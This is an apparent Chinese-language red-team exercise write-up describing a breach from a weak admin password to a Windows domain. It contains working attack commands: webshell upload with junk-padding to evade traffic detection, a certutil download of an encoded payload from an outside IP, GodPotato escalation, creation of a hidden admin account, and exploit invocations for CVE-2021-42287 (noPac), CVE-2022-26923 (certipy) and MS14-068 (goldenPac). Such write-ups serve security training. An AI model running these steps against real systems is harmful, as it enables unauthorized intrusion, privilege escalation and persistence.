攻防演练-从弱口令到域环境的曲折经历

受害机器介绍：出网，无杀毒设备，有流量检测设备，有域环境。

外网打点

传统打点上传webshell

• 弱口令进入后台
  

• 个人资料头像处上传webshell
  

此处有一个比较好玩的点，当我连上webshell，发现是iis权限，再想上传哥斯拉的aspx的webshell，网页显示上传成功且返回路径，访问却显示404，我用冰蝎webshell也上传不上去显示哈希匹配错误。
类似如下：

这里看了一下进程虽然没有杀毒设备，但是有发现一个Ageng，推测有一个针对网络流量的检测设备,且第一次上传成功后执行了几个命令才导致它激活。当然这个网络情况通过冰蝎反弹shell到msf或CS上都是不成功的。

流量设备的简单绕过

这里也有几个思路进行了尝试分别是：
1.在服务器开启http服务，通过certutil下载base64编码的webshell

certutil -encode 1.txt base.txt
certutil -urlcache -split -f http://111.111.111.111:8000/base.txt
certutil -decode base.txt 1.aspx
这里远程下载没问题，不过执行解码为1.aspx的时候，解不出来了

2.通过echo追加写入webshell，发现每当写入危险命令文件就被删除了

当然这里的的webshell绕过也很简单，在webshell内里面的内容开头添加大量的无效数据如下：

此处上传哥斯拉webshell，并使用其自带的土豆家族提权无一例成功，这里当时准备放弃了，不过想到可能是流量检测的问题，如果能将土豆家族的提权exe上传的本地执行呢？而且冰蝎没有内置GodPotato，如果是GodPotato是否能够执行成功呢？

这里不再废话，分别对这几个Potato进行了免杀绕过，果然GodPotato提权到了system权限。

域内渗透

域内信息收集

提权成功后由于没有杀毒，直接创建账户并添加到管理员组

net user admin$ 123456Aa! /add
net localgroup Administrators admin$ /add

使用刚刚的垃圾流量填充上传隧道代理neoreg，远程登录桌面一气呵成。


其中由于机器出网走代理有点卡，这里直接安装向日葵进行控制，在这里也有一个好玩的点，当我在受害机安装好向日葵后却发现怎么都点不开，后来我通过CS读取到administrator的明文密码登录上去才发现，我向日葵主页显示在他那里的窗口上。
使用命令 ipconfig /all 发现该机器在域环境下

administrator账户肯定不是域账户，不过这里使用CS读取到了一个域账号且为明文密码。

登录域账户开始进行域内信息收集
下面展示一些域内信息收集命令。

net time /domain 可看域控机器名字，ping 进而获取域控IP
net user /domain 域内机器
net group "Domain Controllers" /domain 查看域控制器
net localgroup administrators /domain 查看域管理账户
certutil -config - -ping  CA证书和域控机器名字
klist/klist purge 查看票据/清除票据

这里通过前期信息收集获取到域控IP为192.168.123.123 名字为(机器名+域)：XXX.C.com CA证书为（域前缀+类似机器名字有的和机器名一样+CA）：XX-C-CA，机器版本（Windows 10 1607/Server2016(10.0.14393)），域普通用户这里简称：user123/pass123.

CVE-2021-42287

由于Active Directory没有对域中计算机和服务器账号进行验证，经过身份验证的攻击者利用该漏洞绕过完全限制，可将域中普通用户权限提升为域管理员权限并执行任意代码。
前提条件：一个域内普通账号 影响版本：Windows基本全系列 未打补丁KB5008380

noPac.exe scan -domain C.com -user user123 -pass pass123

noPac.exe -domain shdm.com -user user123 -pass pass123 /dc XXX.C.com /mAccount AAA /mPassword asdas1231. /service cifs /ptt

PsExec64.exe \\XXX.C.com cmd

失败

这里我不甘心又使用kali打了一次，远程主机需要配置host和代理
host配置：

192.168.123.123 C.com
192.168.123.123 C-XX-CA
192.168.123.123 XXX.C.com

python sam_the_admin.py “C/user123:pass123” -dc-ip 192.168.123.123 -shell

没有意外的利用失败了！！！

CVE-2022-26923

该漏洞允许低权限用户在安装了Active Directory证书服务（AD CS）服务器角色的默认Active Directory环境中将权限提升为域管理员。现在已经很少没有安装AD CS的大中型Active Directory环境，所以该漏洞危害和利用性都较强。

proxychains certipy account create -u user123@C.com -p pass123 -dc-ip 192.168.123.123  -user hack1 -pass hack@123 -dns 'XXX.C.com'
proxychains certipy req -u 'hack1$'@C.com -p hack@123 -target 192.168.123.123 -ca C-XX-CA -template Machine
proxychains certipy auth -pfx XXXX.pfx -dc-ip 192.168.123.123

此处前两步创建账号并给账号添加属性，申请证书都没有问题，为什么到检验证书就报错证书不匹配呢？这里也是我疑惑的点，希望有大佬能在评论区解答一下疑惑。
这里虽然也获取到了XXXX.pfx，这里我尝试使用openssl进行将pfx转换为私钥和证书

openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt

居然需要密码寄！！！

MS14-068

goldenPac.py是被集成在impacket工具包中，用来操作kerberos的工具。goldenPac.py存放在impacket-master/examples目录中。

使用方法：
python goldenPac.py 域名称/域成员用户:域成员用户密码@域控制器地址

python goldenPac.py C.com/user123:pass123@XXX.C.com

虽然域控机器没拿下
但是他各各网段没有做隔离，最后也是轻松打完满内网